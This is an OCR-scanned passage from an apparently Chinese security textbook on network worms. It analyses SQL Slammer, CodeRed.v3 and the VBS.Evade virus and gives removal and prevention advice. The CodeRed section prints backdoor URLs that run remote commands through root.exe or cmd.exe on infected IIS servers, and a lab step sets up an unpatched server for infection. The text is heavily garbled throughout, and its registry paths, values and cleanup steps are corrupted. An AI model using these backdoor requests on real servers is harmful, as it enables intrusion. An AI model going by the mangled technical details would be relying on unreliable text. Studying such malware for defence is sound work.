播 的 恶性 病毒 , 它 具 有 病毒 的 一 些 共 性 ,如 传播 性 ,隐蔽 性 ,破坏 性 等 ,同时 具有 自己 的 一 些 
特征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 ) ,对 网 络 造成 拒绝 服务 ,以 及 和 黑客 技术 相 
结合 等 。 在 产生 的 破坏 性 上 ,蠕虫 病毒 也 不 是 普通 病毒 所 能 比拟 的 ,网 络 的 发 展 使 得 蠕虫 可 
以 在 很 短 时 间 内 蔓延 整个 网 络 o EE DF EARE E o 

根据 使 用 者 情况 将 蠕虫 病毒 分 为 两 类 ,一 类 是 面向 企业 用 户 和 局 域 网 而 言 , 这 种 病毒 利 
用 系统 漏洞 ,主动 进行 攻击 ,可 以 对 整个 互联 网 造成 竣 痰 性 的 后 果 , 以 “红色 代码 ”、“ 尼 姆 
达 ”, 以 及 最 新 的 “SQL 蠕虫 王 ” 为 代表 ; 另 一 类 是 针对 个 人 用 户 的 ,通过 网 络 (主要 是 电子 邮 
件 ,恶意 网 页 形式 ) 迅 速 传播 的 蠕虫 病毒 ,以 爱 虫 病毒 ,求职 信 病 毒 为 例 。 在 这 两 类 中 ,第 一 
类 具有 很 大 的 主动 攻击 性 ,而 且 爆 发 也 有 一 定 的 突然 性 ,但 相对 来 说 , 查 杀 这 种 病毒 并 不 是 
很 难 。 第 二 类 病毒 的 传播 方式 比较 复杂 和 多 样 ,少数 利用 了 微软 的 应 用 程序 的 漏洞 ,更 多 的 
是 利用 社会 工程 学 对 用 户 进行 欺骗 和 诱 使 ,这 样 的 病毒 造成 的 损失 是 非常 大 的 。 


下 面 将 对 这 两 种 病毒 的 一 些 特征 及 防范 措施 进行 分 析 。 

(1) 蠕虫 病毒 与 一 般 病毒 的 异同 

蠕虫 也 是 一 种 病毒 ,因此 具有 病毒 的 共同 特征 。 一 般 的 病毒 是 需要 寄生 的 , 它 可 以 通过 
自己 指令 的 执行 ,将 自己 的 指令 代码 写 到 其 他 程序 中 ,而 被 感染 的 文件 就 被 称 为 “宿主 ”, 例 
如 ,在 Windows 下 可 执行 文件 格式 为 PE 格式 (Portable Executable) , 当 需 要 感染 PE 文件 
时 ,在 宿主 程序 中 ,建立 一 个 新 节 , 将 病毒 代码 写 到 新 节 中 ,修改 的 程序 入 口 点 等 ,这 样 , 在 宿 
主 程序 执行 时 ,就 可 以 先 执 行 病毒 程序 ,病毒 程序 运行 完 之 后 ,在 把 控制 权 交 给 宿主 原来 的 
程序 指令 。 可 见 ,病毒 主要 是 感染 文件 ,当然 也 有 像 DIR [这 种 链接 型 病毒 ,还 有 引导 区 病 
毒 。 引 导 区 病毒 是 感染 磁盘 的 引导 区 ,如 果 是 软盘 被 感染 ,这 张 软盘 用 在 其 他 计算 机 上 后 ， 
同样 也 会 感染 其 他 计算 机 。 

蠕虫 一 般 不 采取 利用 PE 格式 插入 文件 的 方法 ,而 是 复制 自身 在 互联 网 环境 下 进行 传 
播 , 病 毒 的 传染 能 力主 要 是 针对 计算 机 内 的 文件 系统 而 言 ,而 蠕虫 病毒 的 传染 目标 是 互联 网 
内 的 所 有 计算 机 。 局 域 网 条 件 下 的 共享 文件 夹 .电子 邮件 E-mail、 网 络 中 的 恶意 网 页 .大量 
存在 着 漏洞 的 服务 器 等 都 成 为 蠕虫 传播 的 良好 途径 。 网 络 的 发 展 也 使 得 蠕虫 病毒 可 以 在 很 
短 的 时 间 内 蔓延 全 球 , 而 且 蠕虫 的 主动 攻击 性 和 突然 爆发 性 也 会 造成 很 严重 的 后 果 。 

普通 病毒 和 蠕虫 病毒 之 间 的 区 别 , 如 表 6. 1 所 示 。 


表 6.1 普通 病毒 和 蠕虫 病毒 之 间 的 区 别 


普通 病毒 蠕虫 病毒 


存在 形式 寄存 文件 独立 程序 
传染 机 制 宿主 程序 运行 主动 攻击 
传染 目标 本 地 文件 网 络 计算 机 


(2) 蠕虫 的 危害 和 发 展 趋势 

1988 年 一 个 由 美国 CORNELL 大 学 研究 生 莫 里 斯 编写 的 蠕虫 病毒 理 延 造成 了 数 千 台 
计算 机 停机 ,蠕虫 病毒 开始 现 身 网 络 ; 而 后 来 的 红色 代码 , 尼 姆 达 病 毒 疯狂 的 时 候 , 造 成 几 
十 亿美 元 的 损失 ; 北京 时 间 2003 年 1 月 26 日 ,一 种 名 为 *2003 蠕虫 王 ” 的 计算 机 病毒 迅速 
传播 并 袭击 了 全 球 ,致使 互联 网 网 络 严重 堵塞 ,作为 互联 网 主要 基础 的 域名 服务 器 (DNS) 
的 瘫痪 造成 网 民 浏览 互联 网 网 页 及 收发 电子 邮件 的 速度 大 幅 减 缓 , 同 时 银行 自动 提 款 机 的 
运作 中 断 , 机 票 等 网 络 预订 系统 的 运作 中 断 , 信 用 卡 等 收 付款 系统 出 现 故障 。 专 家 估计 ,此 
病毒 造成 的 直接 经 济 损失 至 少 在 12 亿美 元 以 上 。 

蠕虫 发 作 的 一 些 特点 和 发 展 趋势 ; 

CD 利用 操作 系统 和 应 用 程序 的 漏洞 主动 进行 攻击 。 此 类 病毒 主要 是 “红色 代码 ”和 “ 尼 
姆 达 ”, 以 及 至 今 依 然 肆虐 的 “求职 信 ? 等 。 由 于 IE 浏览 器 的 漏洞 ,使 得 感染 了 “ 尼 姆 达 ” 病 毒 
的 邮件 在 不 去 手工 打开 附件 的 情况 下 病毒 就 能 激活 ,而 此 前 即便 是 很 多 防 病毒 专家 也 一 直 
认为 , 带 有 病毒 附件 的 邮件 ,只 要 不 去 打开 附件 ,病毒 不 会 有 危害 。“ 红 色 代码 ”是 利用 了 微 
软 TIS 服务 器 软件 的 漏洞 (idq. dll 远程 缓存 区 溢出 ) 来 传播 . "SQL 蠕虫 王 ”病毒 则 是 利用 
了 微软 的 数据 库 系 统 的 一 个 漏洞 进行 大 肆 攻 击 。 

© 传播 方式 多 样 。 如 “ 尼 姆 达 ” 病 毒 和 “求职 信 ” 病 毒 ,可 利用 的 传播 途径 包括 文件 、 电 
子 邮 件 、Web 服务 器 、 网 络 共享 等 。 
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© 病毒 制作 技术 新 。 与 传统 的 病毒 不 同 的 是 ,许多 新 病毒 是 利用 当前 最 新 的 编程 语 
言 与 编程 技术 实现 的 ,易于 修改 以 产生 新 的 变种 ,从 而 逃避 反 病 毒 软 件 的 搜索 。 另 外 ,新 
病毒 利用 Java, ActiveX, VB Script 等 技术 ,可 以 潜伏 在 HTML 页 面 中 ,在 上 网 浏览 时 
触发 。 

@ 与 黑客 技术 相 结 合 。 潜 在 的 威胁 和 损失 更 大 ,以 红色 代码 为 例 ,感染 后 的 计算 机 的 
Web 目录 的 \scripts 下 将 生成 一 个 root. exe, 可 以 远程 执行 任何 命令 ,从 而 使 黑客 能 够 再 次 
进入 。 

2. 网 络 蠕虫 病毒 分 析 

蠕虫 和 普通 病毒 不 同 的 一 个 特征 是 蠕虫 病毒 往往 能 够 利用 漏洞 ,这 里 的 漏洞 或 者 说 是 
缺陷 ,可 分 为 两 种 : 软件 的 缺陷 和 人 为 的 缺陷 。 

A) 软件 的 缺陷 : 如 远程 溢出 ,微软 IE 和 Outlook 的 自动 执行 漏洞 等 ,需要 软件 厂商 和 
用 户 共 同 配合 ,不 断 地 升级 软件 。 

(2) 人 为 的 缺陷 : 主要 是 指 计算 机 用 户 的 疏忽 。 这 就 是 所 谓 的 社会 工程 学 (Social 
Engineering) ,例如 : 当 收 到 一 封 邮件 带 着 病毒 的 求职 信和 邮件 时 ,大 多 数 人 都 会 报 着 好 奇 去 

对 于 企业 用 户 来 说 ,威胁 主要 集中 在 服务 器 和 大 型 应 用 软件 的 安全 上 ,而 个 人 用 户 而 
言 ,主要 是 防范 第 二 种 缺陷 。 

利用 系统 漏洞 的 恶性 蠕虫 病毒 分 析 。 

在 这 种 病毒 中 ,以 红色 代码 , 尼 姆 达 和 SQL 蠕虫 王 为 代表 。 它 们 共同 的 特征 是 利用 微 
软 服 务 器 和 应 用 程序 组 件 的 某 个 漏洞 进行 攻击 ,由 于 网 上 存在 这 样 的 漏洞 比较 普遍 ,使 得 病 
毒 很 容易 地 传播 ,而且 攻击 的 对 象 大 都 为 服务 器 ,所 以 造成 的 网 络 堵塞 现象 严重 。 

SQL 蠕虫 王 病毒 攻击 的 是 微软 数据 库 SQL Server 2000, 利 用 MSSQL2000 服务 远程 
堆栈 缓冲 区 溢出 漏洞 ,SQL Server 监听 UDP 的 1434 端口 ,客户 端 可 以 通过 发 送 消息 到 这 
个 端口 来 查询 目前 可 用 的 连接 方式 (连接 方式 可 以 是 命名 通道 也 可 以 是 TCP), 但 是 此 程序 
存在 严重 漏洞 , 当 客户 端 发 送 超 长 数据 包 时 ,将 导致 缓冲 区 溢出 ,黑客 可 以 利用 该 漏洞 在 远 
程 机 器 上 执行 自己 的 恶意 代码 。“SQL 蠕虫 王 ? 病 毒 通过 一 段 376 个 字 节 的 恶意 代码 ,远程 
获得 对 方 主机 的 系统 控制 权限 ,取得 3 个 Win32 API 地 址 ,GetTickCount、socket sendto. 
接着 病毒 使 用 GetTickCount 获得 一 个 随机 数 ,进入 一 个 死 循 环 继续 传播 。 在 该 循环 中 里 
虫 使 用 获得 的 随机 数 生成 一 个 随机 的 TP. 地 址 ,然后 将 自身 代码 发 送 至 1434 端口 (Microsoft 
SQL Server 开放 端口 ) ,该 蠕虫 传播 速度 极 快 ,其 使 用 广播 数据 包 方式 发 送 自身 代码 ,每 次 
均 攻击 子 网 中 所 有 255 台 可 能 存在 机 器 。 由 于 这 是 一 个 死 循环 的 过 程 ,发 包 密 度 仅 和 机 器 
性 能 和 网 络 带 宽 有 关 , 所 以 发 送 的 数据 量 非常 大 。 该 蠕虫 对 被 感染 机 器 本 身 并 没有 进行 任 
何 恶意 破坏 行为 ,也 没有 向 硬盘 上 写 文件 ,仅仅 存在 与 内 存 中 。 对 于 感染 的 系统 ,重新 启动 
后 就 可 以 清除 蠕虫 ,但 是 仍然 会 重复 感染 。 由 于 发 送 数据 包 占用 了 大 量 系 统 资 源 和 网 络 带 
宽 ,形成 Udp Flood, 感 染 了 该 蠕虫 的 网 络 性 能 会 极度 下 降 。 一 个 百 兆 网 络 内 只 要 有 一 两 台 
计算 机 感染 该 蠕虫 就 会 导致 整个 网 络 访问 阻塞 。 

3. CodeRed. v3 病毒 感染 

CD 在 服务 器 上 安装 Windows 2000 Server, 注 意 不 要 安装 补丁 程序 ,以 模拟 实验 环境 
保证 病毒 可 以 人 侵 。 


(2) 在 Windows 2000 Server 服务 器 上 单 击 带 有 病毒 的 邮件 的 附件 ,一 般 来 说 ,邮件 的 
主要 情况 如 下 。 

邮件 主题 : 不 固定 

附加 文件 : 不 固定 ,但 与 邮件 主题 同名 

邮件 内 容 : 英文 或 西班牙 文 ,如 下 

英文 : Hi! How are you? I send you this file in order to have your advice OR I hope 


you can help me with this file that I send OR I hope you like the file that I send you OR 
This is the file with the information that you ask for See you later. Thanks. 

西班牙 文 : Hola como estas? Te mandoeste archivo paraque me des tupunto devista 
ORE sperome puedasayudar conel archivoque te mando ORE sperotegusteeste archivoque te 
mando ORE ste esel archivocon ia informacion que me pediste Nos vemospronto, gracias. 

(3) 带 有 CodeRed. v3 病毒 的 服务 器 情况 。 

蠕虫 的 传播 是 通过 TCP/IP 协议 和 端口 80 ,利用 上 述 漏洞 蠕虫 将 自己 作为 一 个 TCP/IP 
流 直接 发 送 到 染 毒 系统 的 缓冲 区 ,蠕虫 依次 扫描 Web, 以 便 能 够 感染 其 他 的 系统 。 一 旦 感 
染 了 当前 的 系统 ,蠕虫 会 检测 硬盘 中 是 否 存在 c:\notworm, 如 果 该 文件 存在 ,蠕虫 将 停止 感 
染 其 他 主机 。 

蠕虫 会 "强制 "Web 页 中 包含 下 面 的 代码 ,可 以 打开 任 一 HTML 页 面 查 看 : 


<html >< head>< meta http-equiv = "Content-Type"content = "text/html;charset = English"> 
«title» HELLO!</title> 

</head > 

<bady > 

<hr size=5> 

<fontcolor = "red"><p align= "center"> Welcome to http://www. worm. com !< br >< br > 
HackedBy Chinese!</font ></hr > 

</bady > 

</html > 


该 页 面 的 显示 结果 为 : 

Welcome to http://www. worm. com ! 

Hacked By Chinese! 

4. CodeRed. v3 特征 代码 分 析 

下 面 再 对 CodeRed. v3 病毒 进行 特征 分 析 , 这 个 蠕虫 的 行为 可 以 分 为 4 部 分 : 初始 化 、 
感染 、 繁 殖 、 安 装 木 马 。 

(1) 初始 化 

当 一 个 Web 服务 器 感染 此 病毒 后 , 它 首先 将 初始 化 : 

(D 确定 Kernel32. dll 动态 链接 库 中 IIS 服务 器 的 服务 进程 地 址 。 

C 查找 调用 API 函数 GetProcAddress 以 使 用 以 下 API 函数 : 


LoadLibraryA 
CreateThread 


GetSystenTime 
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© 加 载 WS2_32. dll 库 使 用 socket close/socket SA/GetLastError 等 函数 。 

@ 从 USER32. DLL 中 调用 ExitWindowsEx 以 重新 启动 系统 。 

(2) 感染 

CD 蠕虫 设置 一 个 跳 转 表 , 以 便 得 到 所 有 需要 的 函数 地 址 。 

© 获得 当前 主机 的 TP 地 址 ,以 便 在 后 面 的 繁殖 步骤 中 处 理子 网 掩 码 时 使 用 。 

O 检查 系统 语言 是 否 中 文 (中 国 台湾 或 中 华人 民 共 和 国 版 本 )。 

@ 检查 是 否 已 经 执行 过 了 ,如 已 执行 则 跳 至 繁殖 步骤 。 

© 检查 “CodeRedII”atom 是 否 已 被 放置 。 这 个 步骤 可 以 确保 此 主机 不 会 被 重复 感染 。 
(如 已 放置 , 则 进入 永久 休眠 状态 。) 

© 如 上 一 步 检查 没有 发 现 “CodeRedII"atom , 则 增加 一 个 “CodeRedII”atom。 (用 来 
表示 此 主机 已 经 被 感染 。) 

CD 对 于 非 中 文系 统 , 将 工作 线程 数目 定 为 300。 如 果 是 中 文系 统 , 则 设置 为 600。 

@ 蠕虫 开始 产生 一 个 新 的 线程 跳 到 第 一 步 去 执行 。 蠕 虫 会 根据 上 一 步 中 设 定 的 线程 。 
(数目 产生 新 线程 。 这 些 线 程 都 会 跳 至 繁殖 步骤 去 执行 。) 

© 调用 木马 功能 。 

D 如 果 是 非 中 文系 统 , 休 眼 1 天 ; 如 果 是 中 文系 统 ,休眠 2 天。 重新 启动 系统 。 这 会 清 
除 内 存 中 驻 留 的 蠕虫 ,只 留 下 后 门 和 explorer. exe 木马 。 

(3) 繁殖 

(D 设置 IP_STORAGE 变量 。 保 证 不 会 重复 感染 本 主机 。 

© 休眠 64hms 。 

O 获取 本 地 系统 时 间 。 里 虫 会 检查 当前 时 间 是 不 是 小 于 2002 年 或 月 份 小 于 10 月 。 
如 果 日 期 超出 了 上 述 条 件 ,蠕虫 会 重新 启动 系统 。 这 使 蠕虫 的 传播 不 会 超过 10 月 1 日 。 

@ 设置 SockAddr_in 变量 ,获取 攻击 主机 IP 时 会 使 用 这 个 变量 。 

© 设置 Socket 套 接 字 。 蠕 虫 调 用 Socket O 函数, 产生 一 个 套 接 字 , 并 设置 该 套 接 字 为 
非 阻 塞 模式 。 这 可 以 加 速 连接 速度 。 

© 产生 下 一 个 要 攻击 主机 的 IP 并 发 起 连接 。 如 果 连 接 成 功 ,将 跳 到 “设置 套 接 字 为 阻 

CD 调用 select()。 如 果 没 有 返回 句柄 , 则 跳 到 最 后 一 步 。 

设置 套 接 字 为 阻塞 模式 。 这 是 因为 连接 已 经 建立 ,没有 必要 再 使 用 非 阻 塞 模式 。 

© 向 该 套 接 字 发 送 一 份 蠕虫 的 复制 。 

D 执行 recv 调用 。 关 闭 套 接 字 ,返回 第 一 步 。 

繁殖 中 的 TP 地 址 分 析 : 

这 个 蠕虫 的 独特 之 处 在 于 选择 下 一 个 要 连接 的 主机 IP 的 方法 。 它 首先 在 1 一 254 的 范 
围 内 随机 生成 4 个 字 节 (防止 IP 地址 为 一 个 0 或 255)。 然 后 ,随机 从 这 些 字 节 中 取出 一 个 
字 节 ,然后 与 7 做 与 操作 ('AND'), 产 生 一 个 0 —7 之 间 的 随机 数 。 然 后 根据 这 个 随机 数 从 
一 个 地 址 掩 码 表 中 取出 相应 的 掩 码 ,实际 掩 码 在 内 存 中 的 位 置 是 反 向 存储 的 。 

这 个 表 可 以 决定 随机 生成 的 TP 地 址 有 多 少 会 被 使 用 。 例 如 ,如 果 生 成 一 个 随机 数 5， 
则 根据 上 面 的 掩 码 表 , 新 的 地 址 应 该 一 半 为 随机 地 址 一 半 为 旧 IP 地 址 。 例 如 ,目前 受害 者 
IP 地 址 是 192. 168. 1. 1. 随机 产生 的 IP. 可 能 是 01. 23. 45. 67, 则 新 的 攻击 地 址 可 能 为 


192. 168. 45. 67, 

其 结果 就 是 新 的 被 攻击 IP 会 有 3/8 的 概率 (5,6,7) 在 当前 机 器 IP 所 在 的 B 类 地 址 范 
围 内 产生 ,有 4/8 的 概率 (1,2,3,4) 在 A 类 范围 内 产生 ,另外 1/8 的 概率 是 随机 IP 地 址 (0) 。 

蠕虫 如 果 发 现 产生 的 IP 是 127. x. x. x 8k 224. x. x. x, 或 者 与 当前 IP 相同 ,就 会 重新 产 
生 一 个 新 的 IP. 

很 多 情况 下 ,与 被 感染 的 主机 在 同一 或 相近 网 段 内 的 主机 也 使 用 相同 的 系统 。 因 此 ,里 
虫 使 用 这 种 机 制 就 会 大 大 增加 感染 的 成 功率 。 

(4) 安装 木马 

CD 获取 %SYSTEM% 系 统 目录 。 例如 C: \WINNT\SYSTEM32 

© 将 cmd. exe 加 到 系统 目录 字符 串 的 末尾 ,例如 C: \WINNT\SYSTEM32\cmd. exe 

C) 将 驱动 器 盘 符 设置 为 C: 

@ 将 cmd. exe 复制 到 驱动 器 盘 符 : \inetpub\scripts\root. exe 

© 将 cmd. exe 复制 到 驱动 器 盘 符 : Nprogra— INcommon — INsystem MSADC\root. exe 

© 创建 “驱动 器 盘 符 : \explorer. exe" 

(D 往 “ 驱 动 器 盘 符 : \explorer. exe" 中 写 人 二 进 制 代码 。 

@ 关闭 “驱动 器 盘 符 : \explorer. exe" 

© 将 驱动 器 盘 符 改 为 D, 重 复 从 第 @ 步 开始 的 操作 

D 回 到 感染 阶段 的 最 后 一 步 ,开始 休眠。 

安装 木马 的 详细 分 析 : 

蠕虫 创建 的 "explorer. exe” 是 一 个 木马 , 它 的 主要 工作 方式 如 下 。 

获取 本 地 Windows 目录 

执行 真正 的 “explorer. exe” 

进入 下 面 的 死 循环 : 

while(1) 

{ 

设置 "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable" 

为 OFFFFFF9Dh, 禁止 系统 文件 保护 检查 

设置 "SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\Scripts" 

77217 

E Ti"SYSTEMCurrentControlSetVServicesV W3SVCVParametersVVirtual Roots\msadc" 

为 ,,217 

置 "SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\c" 

Pe: V,207 

设置 "SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\d" 

Hj d: V,217 

休眠 10 分 钟 

} 

蠕虫 通过 修改 上 面 的 注册 表 增 加 了 两 个 虚拟 Web 目录 (/c 和 /d), 并 将 其 分 别 映射 到 
C:\ 和 了 D:\。 这 使 得 即使 用 户 删除 了 root. exe, 只 要 “explorer. exe” 木 马 仍 在 运行 ,攻击 者 
仍然 可 以 利用 这 两 个 虚拟 目录 来 远程 访问 系统 。 例 如 : 


http: //TARGET/scripts/root. exe?/c + command (如 果 root. exe 还 存在 ) 
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http: //TARGET/msadcs/root. exe?/c + command 

http: //TARGET/c/winnt/system32/cmd. exe? /c + command (如 果 root. exe 已 经 被 删除 ) 
http: //TARGET/c/inetpub/scripts/root. exe?/c + command 

http: //TARGET/c/progra-—1/common— 1 /system/MSADC/root. exe? /c + command 


蠕虫 将 "explorer. exe” 木 马 放 在 "C:\" 和 "D:\ "的 根 目 录 下 面 ,这 是 想 利用 微软 安全 公 
告 MS00-052 (http: //www. microsoft. com/technet/security/bulletin/ MS00-052. asp) 中 
所 描述 的 漏洞 ,Windows 系统 在 执行 可 执行 程序 时 ,会 先 搜索 系统 盘 根 目录 下 面 有 没有 同 
名 的 程序 ,如 果 有 ,就 先 执行 该 程序 。 因 此 ,如 果 攻 击 者 将 “exploer. exe" 木 马 放 在 系统 盘 根 
目录 下 面 , 就 可 能 先 于 真正 的 “exploer. exe” 被 执行 。 当 属于 管理 员 组 的 用 户 交 互 地 登录 进 
人 系统 时 ,木马 将 被 执行 。 如 果 没 有 安装 SP4 或 MS00-052 中 的 补丁 ,就 可 能 执行 这 个 木马 
程序 ; 否则 ,不 会 执行 这 个 木马 。 

(5) 病毒 清除 

首先 立即 关闭 所 有 80 端口 的 Web 服务 ,避免 病 毒 继续 传播 ,再 按 以 下 要 求 进行 操作 。 

CD 清除 的 Web 服务 器 中 的 两 个 后 门 文件 : /msadc/root. exe. /scripts/root. exe 

这 两 个 文件 的 物理 地 址 一 般 情况 下 默认 为 : 

C: \inetpub\ scripts\root. exe 

C: \progra~1\common~ 1\system\MSADC\ root. exe 

O 清除 本 地 硬盘 中 : C: Vexplorer. exe # D: Vexplorer. exe. 7c E Z& ji JE fe explorer. 
exe, 打 开 “ 任 务 管理 器 ”, 选 择 “ 进 程 ”选项 卡 。 检 查 是 否 进程 中 有 两 个 “exploer. exe”, WR 
找到 两 个 “exploer. exe" ,说明 木马 已 经 在 计算 机 上 运行 了 ,在 菜单 栏 中 选择 “查看 ”>“ 选 定 
列 ”>“ 线 程 计数 ”选项 , 单 击 “ 确 定 ” 按 钮 。 这 时 会 发 现 显示 框 中 增加 了 新 的 一 列 “ 线 程 数 ”， 
检查 两 个 “exploer. exe”, 显 示 线 程 数 为 “1” 的 “exploer. exe” 就 是 木马 程序 ,应 该 结束 这 个 

之 后 ,就 可 以 删除 掉 C: \exploer. exe & D; \exploer. exe 了 ,这 两 个 程序 都 设置 了 隐藏 
和 只 读 属性 。 需 要 设置 “资源 管理 器 ”中 的 “查看 ”一 “选项 ”一 隐藏 文件 为 “显示 所 有 文件 ” 才 
能 看 到 它们 。 

© 清除 病毒 在 注册 表 中 添加 的 项 目 : 


HKLM\ SOF TWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ 

删除 键 : SFCDisable; 键 值 为 : OFFFFFF9Dh 或 将 键 值 改 为 0 
(设置 为 OFFFFFF9Dh 后 ,将 在 登录 时 禁止 系统 文件 检查 ) 

HKLM\ SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ 


HE. Scripts; 键 值 为 : 217 改 为 201 
(这 个 键 默认 就 是 被 打开 的 ,不 过 如 果 没 有 特别 需要 的 话 , 可 以 关闭 。) 
(因为 很 多 漏洞 都 是 利用 了 这 个 虚拟 目录 下 的 文件 攻击 的 。) 


HELM\ SYSTEM\ CurrentControlSet\ Services\W3SVC\Parameters\ Virtual Roots\ 


HË: msadc; 键 值 为 : 217 改 为 201 
( 同 Scripts ) 


HELM\ SYSTEMVCurrentControlSetVServicesV W3SVCVParametersV Virtual RootsV 


删除 键 : cs 键 值 为 : c: \217 
( 它 将 本 地 硬盘 中 的 C 盘 在 Web 中 共享 为 c ) 


HKLM SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ 


删除 键 : d; 键 值 为 : d: \217( 它 将 本 地 硬盘 中 的 D 盘 在 Web 中 共享 为 d) 

如 果 不 删 除 注 册 表 中 的 以 上 键 ,中毒 服务 器 的 本 地 硬盘 C\D 将 被 完全 控制 。 

@ 重新 启动 系统 ,以 确保 CodeRed. v3 彻底 清除 。 

如 果 要 确保 清除 病毒 后 不 再 次 被 感染 ,就 需要 安装 微软 发 布 的 补丁 。 

综 上 所 述 , 此 蠕虫 病毒 本 身 除了 对 网 络 产 生 拒绝 服务 攻击 外 ,并 没有 别 的 破坏 措施 ,但 
如 果 病 毒 编写 者 在 编写 病毒 的 时 候 加 入 破坏 代码 ,后 果 将 不 堪 设 想 。 

(6) 防范 蠕虫 病毒 措施 

企业 防范 蠕虫 病毒 的 时 候 需 要 考虑 几 个 问题 : 病毒 的 查 杀 能 力 ,病毒 的 监控 能 力 ,新 病 
毒 的 反应 能 力 。 而 企业 防毒 的 一 个 重要 方面 是 管理 和 策略 。 推 荐 的 企业 防范 蠕虫 病毒 的 策 
略 如 下 。 

CD 加 强 网 络 管理 员 安全 管理 水 平 ,提高 安全 意识 。 由 于 蠕虫 病毒 利用 的 是 系统 漏洞 进 
行 攻击 ,所 以 需要 在 第 一 时 间 内 保持 系统 和 应 用 软件 的 安全 性 ,保持 各 种 操作 系统 和 应 用 软 
件 的 更 新 。 由 于 各 种 漏洞 的 出 现 , 使 得 安全 不 再 是 一 种 一 劳 永 锡 的 事 , 而 作为 企业 用 户 而 
言 , 所 经 受 攻击 的 危险 也 是 越 来 越 大 ,要 求 企 业 的 管理 水 平和 安全 意识 也 越 来 越 高 。 

O 建立 病毒 检测 系统 。 能 够 在 第 一 时 间 内 检测 到 网 络 异 常 和 病毒 攻击 。 

O 建立 应 急 响 应 系统 。 将 风险 减少 到 最 小 ,由 于 蠕虫 病毒 爆发 的 突然 性 ,可 能 在 病毒 
发 现 的 时 候 已 经 萤 延 到 了 整个 网 络 , 所 以 在 突 发 情况 下 ,建立 一 个 紧急 响应 系统 是 很 有 必要 
的 ,在 病毒 爆发 的 第 一 时 间 即 能 提供 解决 方案 。 

@ 建立 灾难 备份 系统 。 对 于 数据 库 和 数据 系统 ,必须 采用 定期 备份 ,多 机 备份 措施 , 防 
止 意外 灾难 下 的 数据 丢失 。 

© 对 于 局 域 网 而 言 ,可 以 采用 以 下 一 些 主 要 手段 。 

在 因特网 接 入 口 处 安装 防火 墙 式 防 杀 计算 机 病毒 产品 ,将 病毒 隔离 在 局 域 网 之 外 。 

对 邮件 服务 器 进行 监控 ,防止 带 毒 邮件 进行 传播 。 

对 局 域 网 用 户 进行 安全 培训 。 

建立 局 域 网 内 部 的 升级 系统 ,包括 各 种 操作 系统 的 补丁 升级 ,各 种 常用 的 应 用 软件 升 
级 ,各 种 杀毒 软件 病毒 库 的 升级 等 。 


6.3 VBS 病毒 特征 分 析 


6.3.1 病毒 感染 将 征 简介 


常用 的 VBS 病毒 包括 邮件 传播 网 络 传播 .HappyTime、Klez 和 叛逃 者 等 。 
混合 型 脚本 病毒 “叛逃 者 ”VBS. Evade) 病 毒 。 该 病毒 不 但 感染 脚本 文件 、Excel 和 
Word 文档 ,而 且 还 会 直接 覆盖 一 部 分 音乐 .视频 及 工作 文档 。 同 时 “叛逃 者 ”会 通过 
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E-mail 到 处 发 放 已 被 感染 Office 文档 ,造成 用 户 重要 信息 泄露 。 

因此 ,该 病毒 危害 性 极 大 。 下 面 就 该 病毒 的 工作 原理 和 解决 办 法 具体 分 析 介绍 一 下 。 

(1) 该 病毒 的 感染 特征 

叛逃 者 病毒 属于 VBS 脚本 病毒 ,同时 也 具有 宏 病 毒 的 特征 。 当 计算 机 感染 该 病毒 后 ， 
会 发 生 以 下 变化 。 

CD 对 注册 表 的 修改 

(a) 添加 HKEY_LOCAL _MACHINE\Software\ Microsoft\Windows\CurrentVersion\ 
Run\Winsart, 其 值 为 Wscript. exe SysDir\Winstart. vbs %1", 其 中 SYSDir 为 用 户 的 系统 
目录 。 

(b) 修改 HKEY LOCAL MACHINE\Software\Microsoft\Xl. Application. Version V 
Excel \ Security V Level. 和 HKEY | LOCAL _ MACHINE \ Software XV Microsoft V XI. 
Application. Version VExcelNSecurityVAcessVBOM 为 1 。 

Cc) 修改 HKEY LOCAL. MACHINE Software\ MicrosoftV Wd. Application. VersionV 
Excel\ Security V Level 和 HKEY | LOCAL _ MACHINE \ Software V Microsoft V Wd. 
Application. VersionVExcelVSecurityVAcessV BOM JJ 1, 

(d) f£ HKEY _ CURRENT _ USER \ Software V Zed/[ rRIf ] V VBS/Evade V 
RecordContacts\ 键 下 面 会 建立 相应 的 E-mail 发 送 结果 记录 。 

(e) 添加 键 值 HKEY_CURRENT_USER\Software\Zed/[rRIf]\VBS/Evade VBS/ 
Evade. A by Zed[ rRIf] 

@ 添加 的 文件 

该 病毒 运行 后 ,会 在 用 户 的 Windows 目录 添加 如 下 2 个 病毒 体 文件 : Netlnk32. vbs, 
Conversation. vbe; 会 在 用 户 的 系统 目录 添加 如 下 4 个 病毒 体 文件 ，Winstart. vbs, 
Wininst32. vbs、Winnt32. vbs, Winnet32. vbs; 会 在 磁盘 根 目 录 (C 盘 除外 ) 下 建立 文件 
Passwords. vbs ,它们 都 是 对 病毒 本 身 的 完整 备份 。 会 在 系统 目录 添加 evade. gif evade. 
jpg, 这 两 个 文件 是 用 来 载 和 人 到 Excel 和 Word 中 的 病毒 文件 副本 ,它们 不 同 于 前 面 的 几 个 病 
毒 体 文件 。 

@ 对 文件 的 修改 

如 果 存 在 personal. xls 文件 , 则 原 有 文件 将 被 删除 ,并 且 建 立新 的 personal. xls 文件 ; 
否则 ,直接 建立 personal. xls 文件 。 同 时 病毒 也 对 Word 的 模板 进行 感染 。 如 果 存 在 Mirc, 
则 修改 Script. ini 文件 。 

@ 被 感染 的 文件 类 型 

病毒 会 对 . vbs.. vbe 文件 进行 感染 ,同时 也 会 用 病毒 体 对 9 个 目录 下 的 所 有 后 级 为 
. mp3,. mp2,. avi,. mpg.. mpeg,. mpe,. mov,. pdf,. doc,. xls,. mdb,. ppt. pps 的 13 种 数 
据 文件 进行 覆盖 。 

(2) 病毒 的 危害 及 传染 途径 

病毒 不 对 系统 文件 进行 任何 破坏 ,但 是 覆盖 用 户 常 用 的 一 些 宝 贵 数 据 如 mp3 .mpg、 
avi、Doc、pdf、mdb、ppt 等 文件 。 这 种 覆盖 是 不 可 逆 的 ,并 且 病 毒 在 借助 其 传播 时 并 没有 为 
